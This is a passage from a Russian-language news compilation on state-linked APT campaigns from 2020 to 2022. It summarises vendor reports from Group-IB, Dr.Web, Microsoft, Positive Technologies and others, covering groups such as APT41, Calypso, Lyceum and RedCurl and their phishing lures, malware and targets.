Во время этой фишинговой кампании группа APT29 использовала несколько семейств вредоносных программ, включая загрузчики BEATDROP и BOOMMIC, HTML-файл дроппера ROOTSAW и бэкдор BEACON[13].

Хакерские группировки наживаются на конфликте на территории Украины

В середине марта 2022 года по меньшей мере три различные APT-группировки со всего мира запустили кампании целенаправленного фишинга, воспользовавшись военным конфликтом на территории Украины в качестве приманки для распространения вредоносного ПО и кражи конфиденциальной информации. Об этом стало известно 4 апреля 2022 года.

Кампании, проводимые группировками El Machete, Lyceum и SideWinder, нацелены на различные сектора, включая энергетический, финансовый и государственный секторы в Никарагуа, Венесуэле, Израиле, Саудовской Аравии и Пакистане.

Злоумышленники используют приманки в виде официально выглядящих документов, новостных статей или даже объявлений о вакансиях, в зависимости от целей и региона. По словам ИБ-экспертов из Check Point Research, многие документы-приманки используют вредоносные макросы или внедрение шаблонов с целью закрепиться на системах в определенных организациях, а затем запустить вредоносные атаки и установить троян для удаленного доступа с открытым исходным кодом Loki.Rat.

Одна из кампаний организована иранской APT-группировкой Lyceum. Хакеры использовали в ходе своих атак электронного письма, якобы рассказывающие о «российских военных преступлениях на Украине». Письма на самом деле устанавливают на системе жертвы загрузчики на языке .NET и Go (Golang), которые затем используются для развертывания бэкдора с удаленного сервера.

Еще одним примером является SideWinder, предположительно действующая в поддержку политических интересов Индии. В данном случае киберпреступники использовали вредоносный документ для эксплуатации уязвимости Equation Editor в Microsoft Office (CVE-2017-11882) и дальнейшего распространения вредоносного ПО для кражи информации[14].

Хакеры Anonymous взломали сайты крупных российских СМИ

28 февраля 2022 года сайты РБК, Forbes, ТАСС, газет «Известия», «Коммерсантъ», а также нескольких других изданий были взломаны. На главной странице каждого из них появилось сообщение хакеров с призывом прекратить спецоперацию на Украине.

Сообщение с эмблемой группировки начало появляться на сайтах изданий примерно в 14:00 по московскому времени. Сайты СМИ или не загружаются, или пользователи видят сообщение хакеров с призывом. Журналист TAdviser убедился в этом.

Хакеры Anonymous взломали сайты крупных российских СМИ

Баннер представляет собой призыв «прекратить безумие». Вшитая в него ссылка ведет на видеоролик о якобы умерших российских солдатах на Украине. Сообщение заканчивается словами:

«
Неравнодушные журналисты России
»

.
«
Официальный сайт нашего агентства подвергся хакерской атаке и был взломан. Злоумышленники разместили на нем информацию, которая не соответствует действительности. Редакция ТАСС не имеет отношения к этому заявлению, – говорится в сообщении информационного агентства.
»

Там же отметили, что все последние дни сайт ТАСС находился под постоянными массированными хакерскими атаками. К 28 февраля 2022 года по восстановлению работоспособности ресурса, сообщил Департамент корпоративных коммуникаций агентства.

Ранее в феврале 2022 года хакеры из Anonymous объявили «кибервойну» России из-за спецоперации.

«
Коллектив Anonymous официально ведет кибервойну против российского правительства, — говорилось в заявлении хакеров.
»

2021

Group-IB изучила вредоносные кампании прогосударственной хакерской группы APT41

18 августа 2022 года компания Group-IB опубликовала исследование, посвященное активности прогосударственной хакерской группы APT41. По оценкам Group-IB Threat Intelligence за 2021 год атакующие смогли получить доступ как минимум в 13 организаций по всему миру. В рамках вредоносных кампаний, кроме использования интересных техник удалось обнаружить артефакты оставленные атакующими, которые указывают на их происхождение. Отдельное внимание в отчете уделено анализу «рабочих дней» группы.

Прогосударственная хакерская группа APT41 (ARIUM, Winnti, LEAD, WICKED SPIDER, WICKED PANDA, Blackfly, Suckfly, Winnti Umbrella, Double Dragon), целями атак которой являются одновременно кибершпионаж и финансовая выгода, активна по меньшей мере с 2007 года. Аналитики Group-IB Threat Intelligence выделили 4 вредоносных кампании APT41, проведенных в 2021 году, и географически охвативших США, Тайвань, Индию, Вьетнам и Китай. Целевыми индустриями стали государственный сектор, производственные, здравоохранительные, логистические, гостиничные, образовательные организации, а также медиа и авиакомпании. Согласно данным Group-IB, подтвержденных жертв APT41 за 2021 было 13, однако реальное их число может быть значительно большим.

«
Согласно проведенному исследованию, 2021 год был достаточно интенсивным для атакующих из APT41, — отметил аналитик Threat Intelligence компании Group-IB. — В результате анализа обнаруженных нами инструментов и индикаторов компрометации, мы смогли выявить вредоносную активность и предупредить коммерческие и государственные организации о готовящихся или уже совершенных атаках APT41 для того, чтобы они могли предпринять необходимые шаги по защите или поиску следов компрометации своих сетей. Суммарно за 2021 год мы проактивно отправили более 80 таких уведомлений, связанных с APT41.
»

Из инструментов разведки в исследованных кампаниях группа применяла утилиты Acunetix, Nmap, SQLmap, OneForAll, subdomain3, subDomainsBrute, Sublist3r. Традиционно в качестве начального вектора проникновения атакующим из APT41 приписывают фишинг, эксплуатацию различных уязвимостей, в том числе, и Proxylogon, watering hole или атаки на цепочки поставок. Однако в наблюдаемых Group-IB кампаниях злоумышленники проникали в целевые системы используя SQL-инъекции для веб-сайтов с помощью общедоступного инструмента SQLmap. В одних организациях группа получала доступ к командной оболочке целевого сервера, в других — доступ к базам данных с информацией об учетных записях, спискам сотрудников, а также с паролями в чистом и хэшированном виде. В результате таких SQL-инъекций атакующим удалось проникнуть в сети жертв в половине случаев — 43 из 86 веб-сайтов оказались уязвимы.

Как удалось выяснить Group-IB, для загрузки и выполнения вредоносного кода на зараженных устройствах, злоумышленники использовали не встречавшийся исследователями ранее уникальный способ деления полезной нагрузки, в качестве которой применялся кастомизированный инструмент Cobalt Strike Beacon. После компиляции его кодировали в Base64, а затем разбивали ровно по 775 символов и добавляли в текстовый файл определенной командой. Чтобы записать всю полезную нагрузку в файл, в одном из наблюдаемых Group-IB случаев, злоумышленникам понадобилось 154 итерации на это действие. Такой же нестандартный способ деления полезной нагрузки был обнаружен и в сети другой организации, где злоумышленники решили разделить код на блоки по 1024 символа. На то, чтобы записать полезную нагрузку полностью, не привлекая к себе внимания, им потребовалось 128 итераций.

Исследователи Group-IB подчеркивают, что некоторые серверы использовались APT41 исключительно для размещения на них фреймворка Cobalt Strike, другие — только для активного сканирования сети через утилиту Acunetix. Однако были обнаружены серверы, на которых выполнялись обе эти задачи.

«
Несмотря на защиту облачного сервиса CloudFlare, скрывающего реальные адреса серверов, система Threat Intelligence выявила бэкенды серверов APT41, что позволяет нам следить за вредоносной инфраструктурой атакующих и оперативно блокировать их сервера, — добавляют в Group-IB.
»

Важной находкой работы Cobalt Strike, обнаруженной Group-IB, является использование лисенеров с кастомными SSL-сертификатами. Они нужны для принятия подключения от полезной нагрузки, для связи ботов с командным центром. В данном случае APT41 использовали уникальные SSL-сертификаты, которые мимикрируют под Microsoft, Facebook и Cloudflare. Как утверждают в Group-IB, серверы с такими сертификатам начали появляться с начала 2020 года, и их число на конец 2021 года составляло 106. Это значит, что исследователями было замечено более 100 серверов Cobalt Strike, которые используются только этой группой атакующих. Большая часть из них уже не активна. Все данные об инфраструктуре атакующих и индикаторы компрометации автоматически отправляются в систему Group-IB Managed XDR, как части единой платформе Unified Risk Platform, что позволяет детектировать угрозы и обнаруживать кибератаки на ранней стадии.

Исследуя вредоносные кампании APT41, относящиеся к 2021 году, аналитиками Group-IB Threat Intelligence удалось выровнять все временные метки атакующих под UTC+8. Это позволило установить, что основное время работы группы начинается с 9 часов утра и заканчивается ближе к 7 часам вечера. В часовом поясе атакующих находится ряд стран, включая Китай, Малайзию, Сингапур, частично Россию и Австралию.

В качестве элементов атрибуции в отчете приводится список преимущественно китайских IP-адресов для доступа к Cobalt Strike серверам. Также отмечается использование китайских символов на рабочих станциях, с которых проводились атаки. Интересно, что исследователи заметили применение специфического формата Pinyin для названия директорий (Pinyin — это запись звуков китайского языка на латинице).

Исследована APT-атака на телекоммуникационную компанию в Казахстане

В октябре 2021 года в «Доктор Веб» обратилась одна из казахстанских телекоммуникационных компаний с подозрением на наличие вредоносного ПО в корпоративной сети. При первичном осмотре были обнаружены бэкдоры, ранее использовавшиеся лишь в целевых атаках. Об этом компания «Доктор Веб» сообщила 24 марта 2022 года. В ходе расследования удалось установить, что компрометация внутренних серверов компании началась еще в 2019 году. На протяжении нескольких лет основными инструментами злоумышленников были Backdoor.PlugX.93 и BackDoor.Whitebird.30, утилиты Fast Reverse Proxy (FRP), а также RemCom.

Благодаря ошибке хакеров мы получили возможность изучить списки жертв, а также узнали, какие инструменты управления бэкдорами были использованы. Исходя из добытой информации можно сделать вывод о том, что хакерская группировка специализировалась на компрометации почтовых серверов азиатских компаний с установленным ПО Microsoft Exchange. Однако есть жертвы и из других стран, среди которых:

В логи, собранные вместе с управляющим сервером, попали жертвы, зараженные с августа 2021 до начала ноября того же года. При этом в некоторых случаях BackDoor.Whitebird.30 был установлен не только на сервер с Microsoft Exchange, но и на контроллеры домена.

На основе использованных инструментов, методов и инфраструктуры сделан вывод, что за атакой стоит хакерская группировка Calypso APT.

Управляющий сервер для BackDoor.Whitebird.30 называется Remote Rover. Он позволяет удаленно запускать приложения, обновлять конфигурацию бэкдора, а также скачивать и загружать файлы. Помимо этого, с помощью Remote Rover можно использовать командную оболочку.

Так выглядит интерфейс управляющего сервера:

Image:Remote_rover.png

К Remote Rover прилагался конфигурационный файл CFG\default.ini, имеющий следующее содержание: E:\个人专用\自主研发远程\2021\RR\配置备份\telecom.cfg OneClock.exe

Если перевести содержание с китайского языка на английский, то можно получить такой путь: E:\personal use\Independent research and development remote\2021\RR\Configuration backup\telecom.cfg

Подробные технические описания обнаруженных вредоносных программ находятся в PDF-версии исследования и в вирусной библиотеке Dr.Web.

  • BackDoor.Siggen2.3622
  • BackDoor.PlugX.93
  • BackDoor.Whitebird.30
  • Trojan.Loader.891
  • Trojan.Loader.896
  • Trojan.Uacbypass.21
  • Trojan.DownLoader43.44599

В ходе расследования целевой атаки вирусные аналитики «Доктор Веб» нашли и описали несколько бэкдоров и троянов. Злоумышленникам удавалось оставаться незамеченными так же долго, как это было и при других инцидентах, связанных с целевыми атаками. Хакерская группировка скомпрометировала сеть телекоммуникационной компании более двух лет назад.

Иранские APT-группировки стали чаще атаковать ИТ-сектор

Иранские APT-группировки стали чаще атаковать ИТ-сектор. Об этом стало известно 19 ноября 2021 года.

Большинство атак нацелены на индийские компании, а также на несколько компаний в Израиле и Объединенных Арабских Эмиратах.

По мнению ИБ-экспертов из Microsoft Threat Intelligence Center (MSTIC) и Digital Security Unit (DSU), данная деятельность является частью более обширной шпионской кампании по компрометации объектов, представляющих интерес для иранского режима. Техногигант отправил около 1,6 тыс. уведомлений более 40 ИТ-компаний, предупредив о попытках взлома, координируемых иранскими APT.

Большинство атак нацелены на индийские компании, предоставляющие ИТ-услуги, а также на несколько компаний, базирующихся в Израиле и Объединенных Арабских Эмиратах. Как сообщили в Microsoft, две иранские хакерские группы, отслеживаемые как DEV-0228 и DEV-0056, успешно взломали сети ИТ-компаний в Израиле и Бахрейне в июле и сентябре 2021 года.

В июле 2021 года группа DEV-0228 взломала системы одной израильской ИТ-компании, которая предоставляет программное обеспечение для управления бизнесом. DEV-0228 использовала доступ к ИТ-компании для расширения своих атак и компрометации последующих клиентов в оборонном, энергетическом и юридическом секторах в Израиле.

В сентябре DEV-0056 взломала учетные записи электронной почты бахрейнской ИТ-компании, которая работает с клиентами правительства Бахрейна. DEV-0056 также скомпрометировала различные учетные записи в частично принадлежащей правительству организации на Ближнем Востоке, которая предоставляет информационные и коммуникационные технологии для оборонного и транспортного секторов. DEV-0056 находилась в сети организации по крайней мере до октября 2021 года[15].

Целевым атакам подвергались треть российских компаний

9 ноября 2021 года компания Positive Technologies сообщила, что согласно результатам проведенного ею исследования, лишь каждая пятая организация использует для защиты решения, которые действительно могут обнаружить киберпреступников в сети. При этом наметилась тенденция к выявлению сложных атак с помощью комплексных решений.

Компания Positive Technologies провела анонимный опрос среди специалистов по информационной безопасности компаний из девяти отраслей: финансовой, промышленной, государственного сектора, ТЭК, образования, телекоммуникаций, здравоохранения, СМИ и IT. В каждой сфере были обнаружены организации, которые подвергались целенаправленным атакам. Чаще всего жертвами становились финансовые компании - 44% случаев, на втором месте оказались предприятия топливно-энергетического комплекса - 33%, замыкают тройку госучреждения - 29% случаев.

Чаще всего от целенаправленных атак страдали финансовые организации

Большинство целевых атак были направлены на конкретную компанию, отрасль или группу лиц; как правило, такие атаки проводят после предварительной разведки и сбора информации о жертве. Эти атаки могут нанести ощутимый урон и напрямую повлиять на работу организации, в том числе на финансовые результаты.

По мнению специалистов по ИБ, главная цель хакеров во время атаки на их компании - кража ценной информации

Респонденты отметили, что в результате целевых атак они чаще всего сталкивались с такими последствиями, как простой инфраструктуры , нарушение бизнес-процессов и уничтожение или изменение данных.

Основным последствием кибератак, согласно опросу, является простой инфраструктуры

При этом большинство организаций практически не защищены от подобных угроз: они используют базовые средства защиты, у некоторых нет даже антивирусов. Классы решений, которые сфокусированы на обнаружении злоумышленника в сети, есть лишь в каждой пятой компании: песочницы (Sandbox), которые проверяют файлы в изолированной виртуальной среде, есть у 28% опрошенных, системы глубокого анализа трафика (NTA) - у 27%. Специализированные комплексные решения используют только 15% респондентов.

В ближайшие годы компании планируют внедрять системы для глубокого анализа трафика NTA и NDR, а также комплексные решения для защиты от целевых атак

По итогам исследования эксперты Positive Technologies видят и позитивные сдвиги: компании понимают необходимость повышения уровня безопасности и планируют расширять арсенал средств защиты.

«
«Опрос помог нам выяснить, насколько защищены от целевых атак организации в разных сферах, а также лучше понять тенденции в использовании средств защиты. Мы узнали, что каждая пятая организация намерена начать использовать NTA-систему и комплексные решения для защиты от целевых атак. Это значит, что их способность обезопасить себя от таких угроз повысится. Растет также и интерес к матрице MITRE ATT&CK. А раз есть потребность, то было бы целесообразно адаптировать данную матрицу под запросы российского рынка», -

говорит Наталия Казанькова, старший менеджер по продуктовому маркетингу Positive Technologies.
»

Исследование также выявило, что 39% специалистов из IT-компаний планируют приобрести для обнаружения сложных угроз песочницу. Представители промышленности собираются закупать системы мониторинга событий ИБ - SIEM (40%), глубокого анализа трафика - NTA (36%), проверки файлов в изолированной виртуальной среде - Sandbox (36%). В финансовой отрасли 40% организаций будут усиливать защиту от целевых атак, используя комплексные решения, а 27% - станут использовать решения для защиты конечных точек EDR и файрволы NGFW.

Как показал опрос, 67% специалистов либо уже пользуются базой данных MITRE ATT&CK, разработанной и поддерживаемой корпорацией MITRE на основе анализа реальных APT-атак, либо планируют ее применять в работе. С помощью этого структурированного в виде наглядной таблицы списка тактик, для каждой из которых указаны возможные техники, специалисты по ИБ могут отслеживать информацию об актуальных угрозах, строить гипотезы для их проактивного обнаружения и эффективно защищать свои компании.

Три китайские APT-группировки атаковали крупные телекоммуникационные компании

3 августа 2021 года стало известно о том, что команда исследователей в области кибербезопасности Cybereason Nocturnus обнаружила три вредоносные кампании по кибершпионажу, направленные на взлом сетей крупных телекоммуникационных компаний. Предположительно, атаки осуществляются в интересах Китая.

Вредоносная кампания, получившая общее название DeadRinger, нацелена на компании в Юго-Восточной Азии. По словам экспертов, атаки организованы тремя киберпреступными группировками (APT), предположительно связанными с правительством Китая. Данный вывод сделан на основе сравнения тактик и методов с другими известными китайскими APT.

Первая кибероперация предположительно связана с APT Soft Cell. В ходе второй операции под названием Naikon, организованной в конце 2020 года, были атакованы телекоммуникационные компании. Как предполагают исследователи, Naikon может быть связана с военным бюро Народно-освободительной армии Китая (НОАК). Третья кибероперация была организована в 2017 году APT27 (также известной как Emissary Panda). Преступники использовали бэкдор, применяемый для компрометации серверов Microsoft Exchange.

Методы хакеров включали использование уязвимостей в Microsoft Exchange Server, установку web-оболочки China Chopper, использование Mimikatz для хищения учетных данных, создание маяков Cobalt Strike и бэкдоров для подключения к C&C-серверу.

В каждой волне кибератак целью преступников являлся кибершпионаж путем сбора конфиденциальной информации, компрометация важных бизнес-активов, таких как серверы биллинга, содержащие данные Call Detail Record (CDR), а также ключевые сетевые компоненты, в том числе контроллеры домена, web-серверы и серверы Microsoft Exchange.

В некоторых случаях группировки могли одновременно находиться в одной и той же скомпрометированной среде. Однако неясно, работали ли они независимо или все находились под руководством конкретной группировки[16].

Выявлена серия масштабных кибератак на российские органы государственной власти

Дочерняя компания «Ростелекома», национальный провайдер технологий кибербезопасности «Ростелеком-Солар», совместно с НКЦКИ (Национальным координационным центром по компьютерным инцидентам, созданным ФСБ России) выявили серию целенаправленных атак профессиональной кибергруппировки на российские федеральные органы исполнительной власти. Об этом «Ростелеком-Солар» сообщил 12 мая 2021 года. Главной целью хакеров являлась полная компрометация ИТ-инфраструктуры и кража конфиденциальной информации, в том числе документации из изолированных сегментов и почтовой переписки ключевых сотрудников.

«
Исходя из сложности используемых злоумышленниками средств и методов, а также скорости их работы и уровня подготовки, мы имеем основания полагать, что данная группировка располагает ресурсами уровня иностранной спецслужбы. Это высококвалифицированные киберпреступники, которые могли долго находиться внутри инфраструктуры и не выдавать себя. Благодаря совместной работе с «Ростелеком-Солар» нам удалось своевременно выявить злонамеренную деятельность и пресечь ее. Информация, необходимая для выявления данной угрозы в других информационных ресурсах, направлена всем участникам ГосСОПКА, чтобы предотвратить повторение подобных инцидентов,
сказал Николай Мурашов, заместитель директора Национального координационного центра по компьютерным инцидентам (НКЦКИ).
»

Для проникновения в инфраструктуру злоумышленники использовали три основных вектора атак: фишинговые рассылки с вредоносным вложением, эксплуатацию веб-уязвимостей и взлом инфраструктуры подрядных организаций, информацию о которых хакеры собирали в том числе из открытых источников. Тщательное предварительное исследование предшествовало и подготовке фишинговых рассылок, на что указывает уровень их проработки: письма были адаптированы под специфику деятельности конкретного ФОИВ и содержали темы, соотносящиеся с актуальными задачами организаций.

Проникнув внутрь инфраструктуры, злоумышленники собирали информацию об устройстве сети и о ключевых сервисах. Чтобы получить контроль, они стремились атаковать рабочие станции ИТ-администраторов с высокими привилегиями доступа и системы управления инфраструктурой. При этом киберпреступники обеспечивали себе достаточно высокий уровень скрытности за счет использования легитимных утилит, недетектируемого вредоносного ПО и глубокого понимания специфики работы средств защиты информации, установленных в органах власти.

После полной компрометации инфраструктуры целью злоумышленников был сбор конфиденциальной информации со всех интересующих их источников: с почтовых серверов, серверов электронного документооборота, файловых серверов и рабочих станций руководителей разного уровня.

Выявленные атаки отличают несколько характерных особенностей. Во-первых, разработанное злоумышленниками вредоносное ПО использовало для выгрузки собираемых данных облачные хранилища российских компаний Yandex и VK (ранее Mail.ru Group). Сетевую активность хакеры маскировали под легитимные утилиты «Yandex Disk» и «Disk-O».

Во-вторых, на стадии подготовки к атакам хакеры явно изучили особенности администрирования одного из российских антивирусов и смогли использовать его легитимные компоненты для сбора дополнительной информации об атакуемой сети.

Все эти специфические черты атаки говорят о том, что злоумышленники провели тщательную предварительную подготовку и изучили как специфику деятельности российских органов госвласти, так и особенности российских инфраструктур.

«
Эффективное противодействие подобным кибергруппировкам возможно только при сочетании нескольких факторов: богатого опыта обеспечения безопасности органов государственной власти, расширенного стека технологий по выявлению атак и сильной экспертной команды, способной на круглосуточное противодействие группировкам,
отметил Игорь Ляпунов, вице-президент «Ростелекома» по информационной безопасности.
»

2020

Group-IB зафиксировала 7 ранее неизвестных проправительственных групп на карте киберпротивостояния спецслужб

Компания Group-IB, международная компания, специализирующаяся на предотвращении кибератак, исследовала ключевые изменения, произошедшие в сфере киберпреступлений в мире и 25 ноября 2020 года поделилась своими прогнозами по развитию киберугроз на 2021 год. Подробнее здесь.

Уходящий год показал, что все чаще шпионаж сменяется активными попытками уничтожения объектов инфраструктуры. Военные операции становятся более явными, а акценты смещаются со шпионажа на уничтожение инфраструктуры, говорится в отчете Group-IB Hi-Tech Crime Trends 2020-2021. Арсенал атакующих активно пополняется инструментами для атак на физически изолированные сети объектов критической инфраструктуры. Очевидной целью атакующих становится ядерная энергетика. Если в 2019 году в публичном пространстве не было зафиксировано ни одной атаки, то в этом инциденты произошли на ядерных объектах Ирана и Индии. Еще одной резонансной атакой стала попытка диверсии в Израиле, где целью стали системы водоснабжения, в которых хакеры пытались изменить уровень содержания хлора. Успех этой атаки мог привести к серьезной нехватке воды и потерям среди гражданского населения. При этом прогосударственные группы не теряют интереса к телекоммуникационному сектору: за анализируемый период здесь проявляли активность 11 групп, связанных с спецслужбами. Задачами злоумышленников по-прежнему остаются шпионаж за телекомоператорами и попытки вывода их инфраструктуры из строя. В частности, были установлены рекорды мощности DDoS-атак: 2,3 Тб/с и 809 млн пакетов в секунду. Значительной проблемой остается перехват или утечка BGP-маршрутов. За последний год было публично зафиксировано девять таких инцидентов.

На карте гонки киберпротивостояния спецслужб наибольшее количество групп сосредоточено в Китае – 23, в Иране — 8 групп, в Северной Корее и России — по 4 группы, в Индии – 3 группы, в Пакистане и Секторе Газа — по 2 группы. Замыкают антирейтинг Вьетнам, Турция и Южная Корея – по одной группе в каждой стране.

Согласно проанализированным данным Group-IB, самым атакуемым за отчетный период стал Азиатско-Тихоокеанский регион, к которому проявляли интерес проправительственные группы из Китая, Северной Кореи, Ирана и Пакистана: суммарно 34 кампании было проведено в данном регионе. На втором месте Европейские страны (22 кампании), которыми в основном интересовались группы из Китая, Пакистана, России и Ирана. Далее следуют Средний Восток и Африка: здесь было проведено 18 кампаний, в основном, хакерами из Ирана, Пакистана, Турции, Китая и Газы. Россия и США – наименее атакуемые державы. Согласно аналитике, приведенной в отчете, 15 кампаний было проведено в США и 9 в России. Состав атакующих при этом схож для обеих стран – в основном, это группы из Китая, Северной Кореи и Ирана. В России зафиксирована одна атака Казахстанских спецслужб, США атаковали также хакеры из Сектора Газа и Пакистана.

Также аналитиками было обнаружено семь ранее неизвестных APT-групп, среди них: Tortoiseshell (Иран), Poison Carp (Китай), Higaisa (Южная Корея), AVIVORE (Китай), Nuo Chong Lions (Саудовская Аравия), а также Chimera и WildPressure, принадлежность которых к какой-либо стране остается не установленной. Кроме того, выявлена активность шести групп, которые оставались незамеченными последние несколько лет. Это лишний раз показывает, что не стоит недооценивать APT-группы и их изощренность, подчеркнули в Group-IB.

«Доктор Веб» обнаружил подготовку к шпионской атаке на российские предприятия ТЭК

24 сентября 2020 года стало известно, что разработчик средств информационной защиты компания «Доктор Веб» опубликовала[17] исследование фишинговой кампании, которая была нацелена на российские предприятия топливно-энергетического комплекса. Первая волна была датирована апрелем 2020 года, последние проявления активности случились в сентябре 2020 года.

«Доктор Веб» обнаружил подготовку к шпионской атаке на российские предприятия ТЭК. Источник фото: ru.ihodl.com

В «Доктор Веб» уверены, что речь идет о попытке одной из китайских APT-кампаний атаковать предприятия ТЭК с целью кибершпионажа. При этом качество фишинговых писем было очень низким.

В апреле сотрудникам ряда предприятий топливно-энергетического комплекса России под видом обновленного телефонного справочника рассылались документы с расширением .docx, которые загружали два изображения с удаленных ресурсов.

«
Одно из них загружалось на пользовательский компьютер с сервера news.zannews.com. Примечательно, что доменное имя схоже с доменом антикоррупционного медиацентра Казахстана — zannews.kz. С другой стороны, используемый домен сразу напомнил о другой кампании 2015 года, известной как TopNews, в которой использовался бэкдор IceFog, а домены управления троянами имели подстроку «news» в названиях, - говорится в публикации компании.
»

Эксперты отметили также, что при отправке писем различным адресатам в запросах на загрузку изображения использовались разные параметры запроса или же уникальные имена изображений. Вероятно, это было сделано с целью сбора информации для определения «надежного» адресата, который и в следующий раз с высокой долей вероятности откроет письмо. Для загрузки изображения со второго сервера использовался протокол SMB, что могло быть сделано для сбора NetNTLM-хешей с компьютеров сотрудников, открывших полученный документ

В июне 2020 года злоумышленники начали использовать другое доменное имя — sports.manhajnews.com; субдомены manhajnews.com использовались в спам-рассылках как минимум с осени 2019 года.

В июне также была запущена кампания, с другим документом, который содержал информацию об отраслевом развитии, и измененным сервером для загрузки изображений.

Тексты всех этих писем явно указывали на то, что их авторы не являются носителями русского языка и имеют крайне поверхностное представление о его грамматике.

Иллюстрация: drweb.ru

Для рассылок применялись, однако, почтовые ящики на mail.ru и yandex.ru.

В начале сентября 2020 года авторы кампании перешли к более агрессивным действиям: спам-кампания распространяла документ Word, в котором уже содержался вредоносный макрос. Его задачей было доставить на компьютер жертвы простой загрузчик, который может получать и запускать шелл-код от управляющего сервера. В конечном счете специалисты «Доктор Веб» выявили два типа бэкдоров, попадающих жертвам таким образом: ранее не встречавшийся BackDoor.Siggen2.3238 и уже знакомый BackDoor.Whitebird, ранее использовавшийся в атаках на госучреждение в Казахстане.

«
Анализ документов, вредоносных программ, а также использованной инфраструктуры позволяет нам с уверенностью сказать, что атака была подготовлена одной из китайских APT-групп. Учитывая функциональность бэкдоров, которые устанавливаются на компьютеры жертв в случае успешной атаки, заражение ведет как минимум к краже конфиденциальной информации с компьютеров атакованных организаций. Кроме того, весьма вероятным сценарием является установка специализированных троянов на локальные серверы с особой функцией, такие как контроллеры домена, почтовые серверы, интернет-шлюзы и т. п., - говорится в публикации «Доктор Веб".
»

«
Сложно представить себе человека в здравом уме, у которого письма, рассылавшиеся в рамках этих кампаний, не вызвали бы подозрение и усмешку заодно. С другой стороны, вложения к подобным письмам могут открывать по невнимательности, и это единственное, пожалуй, на что операторы кампании в этот раз могли расчитывать. При всей курьезности данных атак, проблема с попытками взламывать стратегические предприятия стоит чрезвычайно остро. И даже столь неумелые, на первый взгляд, атаки могут быть тревожным признаком - в следующий раз фишинговые послания могут быть написаны уже на идеальном русском языке и с указанием имен, фамилий и должностей реальных сотрудников атакуемой организации.
говорит Михаил Зайцев, эксперт по информационной безопасности компании SEQ (ранее SEC Consult Services).
»

Группа RedCurl атаковала десятки целей от России до Северной Америки с целью кражи корпоративных данных

13 августа 2020 года компания Group-IB представила аналитический отчет о ранее неизвестной хакерской группе RedCurl, специализирующейся на корпоративном шпионаже. Менее чем за 3 года RedCurl атаковала десятки целей от России до Северной Америки. Группа, предположительно, состоящая из русскоговорящих хакеров, проводит тщательно спланированные атаки на частные компании различных отраслей, используя уникальный инструментарий. Цель атакующих – документы, представляющие коммерческую тайну и содержащие персональные данные сотрудников. Корпоративный шпионаж в целях конкурентной борьбы – на август 2020 года редкое явление на хакерской сцене, однако частота атак говорит о том, что вероятнее всего оно получит дальнейшее распространение.

Жертвы кибершпионажа хакерской группы RedCurl

Group-IB впервые раскрыла тактику, инструменты и особенности инфраструктуры группы RedCurl. Документ, доступный на сайте компании, приводит подробное описание цепочки атаки, подготовленное специалистами Лаборатории компьютерной криминалистики Group-IB, и данные, собранные в ходе реагирования на инциденты, атрибутированные к кампаниям RedCurl.

По информации компании, группа RedCurl, обнаруженная экспертами F.A.C.C.T. Threat Intelligence, активна как минимум с 2018 года. За это время она совершила 26 целевых атак исключительно на коммерческие организации. Среди них — строительные, финансовые, консалтинговые компании, ритейлеры, банки, страховые, юридические и туристические организации. RedCurl не имеет четкой географической привязки к какому-либо региону: ее жертвы располагались в России, Украине, Великобритании, Германии, Канаде и Норвегии.

Группа действовала максимально скрытно, чтобы минимизировать риск обнаружения в сети жертвы. Во всех кампаниях главной целью RedCurl была кража конфиденциальных корпоративных документов — контрактов, финансовой документации, личных дел сотрудников, документов по судебным делам, по строительству объектов и др. Все это может свидетельствовать о заказном характере атак RedCurl с целью недобросовестной конкуренции.

Примечательно, что одной из вероятных жертв группы стал сотрудник компании, занимающейся информационной безопасностью и предоставляющей клиентам защиту от таких атак. Всего Group-IB удалось идентифицировать 14 организаций, ставших жертвами шпионажа со стороны RedCurl. Некоторые были атакованы несколько раз. Специалисты Group-IB связывались с каждой пострадавшей организацией. В ряде из них идет реагирование.

Самая ранняя известная атака RedCurl была зафиксирована в мае 2018 года. Как и во всех будущих кампаниях группы, первичным вектором было тщательно проработанное фишинговое письмо. Группа детально изучает инфраструктуру целевой организации; каждое письмо составляется не просто под организацию-жертву, а под конкретную команду внутри нее. Чаще всего атакующие направляли свои письма от имени HR-департамента. Как правило, атака шла на нескольких сотрудников одного отдела, чтобы снизить их бдительность, например, все получали одинаковую рассылку по ежегодному премированию. Фишинговое письмо составляется максимально качественно – в нем фигурируют подпись, логотип, поддельное доменное имя компании. Специалисты Group-IB Threat Intelligence подчёркивают, что подход RedCurl напоминает социотехнические атаки специалистов по пентесту, в частности, Red Teaming (услуга по проверки способности организации к отражению сложных кибератак с использованием методов и инструментов из арсенала хакерских группировок).

Для доставки полезной нагрузки RedCurl используют архивы, ссылки на которые размещаются в теле письма и ведут на легитимные облачные хранилища. Ссылки замаскированы так, что пользователь не подозревает, что открывая вложение с документом о премировании якобы с официального сайта, он инициирует развертывание трояна, контролируемого атакующими через облако, в локальной сети. Троян-загрузчик RedCurl.Dropper – пропуск злоумышленников в целевую систему, который установит и запустит остальные модули ВПО. Как и весь собственный инструментарий группы, дроппер был написан на языке PowerShell.

Главная цель RedCurl – кража документации из инфраструктуры жертвы и корпоративной переписки. Оказавшись в сети, злоумышленники сканируют список папок и офисных документов, доступных с зараженной машины. Информация о них отправляется на облако, и оператор RedCurl решает, какие папки и файлы выгрузить. Параллельно все найденные на сетевых дисках файлы с расширениями *.jpg, *.pdf, *.doc, *.docx, *.xls, *.xlsx подменялись на ярлыки в виде модифицированных LNK-файлов. При открытии такого файла другим пользователем происходит запуск RedCurl.Dropper. Таким образом, RedCurl заражают большее количество машин внутри организации-жертвы и продвигаются по системе.

Также злоумышленники стремятся получить учетные данные от электронной почты. Для этого используется инструмент LaZagne, который извлекает пароли из памяти и из файлов, сохраненных в веб-браузере жертвы. Если необходимые данные получить не удается, RedCurl задействуют сценарий Windows PowerShell, который показывает жертве всплывающее фишинговое окно MicrosoftOutlook. Как только доступ к электронной почте жертвы получен, RedCurl проводят анализ и выгрузку всех интересующих их документов на облачные хранилища.

В ходе реагирований на инциденты, связанные с группой RedCurl, DFIR-специалисты Group-IB выяснили, что после получения первоначального доступа атакующие находятся в сети жертвы от 2-х до 6-ти месяцев. Троян RedCurl.Dropper, как и остальные инструменты группы, не подключается к командному серверу злоумышленников напрямую. Вместо этого все взаимодействие между инфраструктурой жертвы и атакующими происходит через легитимные облачные хранилища, такие как Cloudme, koofr.net, pcloud.com и другие. Все команды отдаются в виде PowerShell скриптов. Это позволяет RedCurl оставаться невидимыми для традиционных средств защиты длительное время.

«
